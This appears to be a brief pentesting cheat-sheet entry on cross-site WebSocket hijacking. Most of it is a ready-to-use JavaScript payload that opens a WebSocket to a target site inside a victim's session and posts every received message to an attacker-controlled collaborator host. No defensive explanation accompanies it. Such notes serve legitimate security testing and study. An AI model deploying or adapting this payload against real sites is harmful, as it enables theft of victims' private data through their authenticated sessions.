WebSockets
Vulnerabilities
Cross-site WebSocket hijacking (CSWSH)
<script>
var ws = new WebSocket('vulnerable-website.com/websocket');
ws.onopen = function() {
// Send some stuff if needed
ws.send("READY");
};
ws.onmessage = function(event) {
// Receive data and send it to "us"
fetch('xyz.burpcollaborator.com', { method: 'POST', mode: 'no-cors', body: event.data });
};
</script>Last updated